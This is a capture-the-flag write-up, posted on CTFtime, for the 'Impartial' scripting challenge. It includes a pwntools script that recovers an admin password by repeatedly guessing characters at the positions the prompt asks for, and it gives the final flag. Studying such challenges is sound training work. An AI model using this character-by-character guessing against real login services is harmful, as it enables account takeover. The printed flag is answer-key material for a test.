CTFtime.org

Impartial

by roerohan / csictf

Tags: scripting 

Rating:

# Impartial

Author: [roerohan](https://github.com/roerohan)

# Requirements

- Python

# Source

```
Check out the terminal-interface for this new company! Can you uncover any secrets?

Connect with:
nc jh2i.com 50026
```

# Exploitation

Everytime you ask try to log in as admin, it asks you for 3 letters of the password.

```
Impartial Advice and Consulting
. . . we will help you put the pieces together!

1. About
2. Login
3. Register
4. Contact
?. Exit

> 2

Please enter a username to log in.

Username: admin

For your security, please only enter a partial password.
To protect your account from hackers, enter only the characters
at position 13, 32, and 10 (separated by spaces).

Password:
```

You can create a map of all characters and the possibilities of the character in that position. Once it is rejected, remove that possibility, and once it's correct, remove all other possibilities. Here's a script:

```python
from pwn import remote
import re
import string

r = remote("jh2i.com", 50026)

flag = [''] + list('flag{') + ['?']*50

letters = list(string.ascii_lowercase + '_}1234567890')
tries = {i: letters for i in range(1, 51)}

# flag = [''] + list('flag{partial?pass?ord?puz?le?pieces????????????????????')
# flag{partial_password_puzzle_pieces}
for i in range(1, len(flag)):
if flag[i] == '?': continue
tries[i] = [flag[i]]

rec = r.recvuntil(">").decode()
print(rec, end=" ")

while True:
res = b"2"
r.sendline(res)
print(res)

rec = r.recvuntil("Username:").decode()
print(rec, end=" ")

res = b"admin"
r.sendline(res)
print(res)

rec = r.recvuntil("Password:").decode()
print(rec, end=" ")

indices = [int(i) for i in re.findall(r'\d+', rec)]

res = []

for index in indices:
res.append(tries[index][0])

res = ' '.join(res)
print(res)
r.sendline(res)

rec = r.recvuntil('>').decode()
print(rec)

if '1. Judge' in rec:
r.sendline(b'3')
print(''.join(flag))
continue

x = rec.split('1. About')[0].strip().split('\n')

for i in range(len(x)):
t = tries[indices[i]]
if 'WRONG' in x[i]:
tries[indices[i]] = t[1:]
else:
tries[indices[i]] = [t[0]]
flag[indices[i]] = t[0]
print(''.join(flag))
```

When I ran the script for a while, I got this much of the flag:

```
$ python script.py
...
flag{partial?pass?ord?puz?le?pieces????????????????????
```

From here, you can possibly guess the flag.

The flag is:

```
flag{partial_password_puzzle_pieces}
```

Original writeup (https://github.com/csivitu/CTF-Write-ups/tree/master/HacktivityCon%20CTF/Scripting/Impartial).

Comments